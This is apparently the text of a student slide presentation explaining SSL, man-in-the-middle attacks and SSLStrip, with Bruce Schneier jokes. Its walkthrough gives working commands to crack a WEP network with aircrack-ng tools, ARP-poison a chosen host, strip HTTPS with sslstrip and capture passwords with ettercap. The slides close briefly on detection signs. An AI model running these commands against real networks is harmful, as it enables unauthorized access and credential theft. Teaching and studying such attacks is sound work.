Академический Документы
Профессиональный Документы
Культура Документы
Trevor Kiernan Glen Saunders Bruce Schneier's earliest childhood memory is encrypted.
Attack
What is SSL?
Secure Socket Layer Predecessor to Transport Layer Security (TLS) Establishes a secure connection between two computers Important for banking sites and others Authenticates: the server is actually who it says it is
Runs on port 443 (not http's port 80) Client sends server hello and certificate Server sends a signed certificate Verified by Certificate Authority such as Verisign Certificate used to encrypt data
What is MITM?
Eve tells Bob she is Alice and Alice that she is Bob
Bruce Schneier killed Eve and Mallory with a birthday attack!
What is MITM?
When Alice sends something to Eve (thinking she's Bob), Eve can read it Eve forwards this information to Bob Bob replies to Eve (thinking she's Alice) Eve can read e-mail and intercept supposedly secure data (user name and passwords!)
ARP = address resolution protocol Alice sends ARP request (who is 192.168.1.1?) Eve replies before router can so that Alice thinks she is the router Now Alice's ARP cache is poisoned; thinks Eve is the router Eve forwards packets to her router
What is SSLStrip?
Performs afforementioned MITM attack Forwards all regular HTTP traffic Changes Alice's HTTP request to HTTPS Forwards this request via HTTPS to Bob Explicit HTTPS request is sent a fake certificate signed by Eve Replaces images with secure lock
Capturing Information
Ettercap pulls passwords and user names for many different programs and protocols Displays Bob's IP and URL SSLStrip creates a log file
What we did
1. Scan for networks 2. Crack a network 3. Connect to the cracked network 4. Learn about a host on the network 5. MITM on that Host 6. Strip his/her SSL 7. Scan for usernames and passwords 8. Exit gracefully
Airodump-ng wlan1
Crack it
airodump-ng -c 11 -w target_router wlan1 & aireplay-ng -1 0 -e target_router -h [faked mac address] wlan1 after successful connection, aireplay-ng -3 -e target_router -h [faked mac] wlan1 let the data rate climb and aircrack-ng target_router-01.cap Within 5 minutes you should have the WEP key. :-D
Connect
Connect to the router with the card you just attacked with. It should still have the same faked mac address it was set to in the previous arp-replay attack So now its time for some recon
The tattoos on Bruce Schneier's fists say "Alice" and "Bob". You don't want to make him exchange keys over your face.
RECON
This keeps the packet count lower and limits it to pinging We liked 192.168.1.2 Ran an os fingerprint on it and checked which versions open ports were using This generates a lot of traffic This host looked good, and responded to our probes, so lets MITM.
Find a host
RECON homing in
MITM
arpspoof -i wlan0 -t [their ip] [router ip] arpspoof -i wlan0 -t 192.168.1.2 192.168.1.1
SSL strip
sslstrip -a -k -f
-a : log all ssl traffic -k : kill current sessions -f : insert a lock icon in their connections
ettercap -T -q -i wlan0
This will log traffic over our connection and filter the target's passwords, causing them to show in our window. We can pipe this to a file as well.
The set of Bruce Schneier's weaknesses is a mathematical constant. It is represented by the symbol .
If Bruce Schneier wants your plaintext, he'll just squeeze it out of the ciphertext using his barehands
How to Prevent?
ARP replies appearing very frequently Invalid certificate error Nmap scans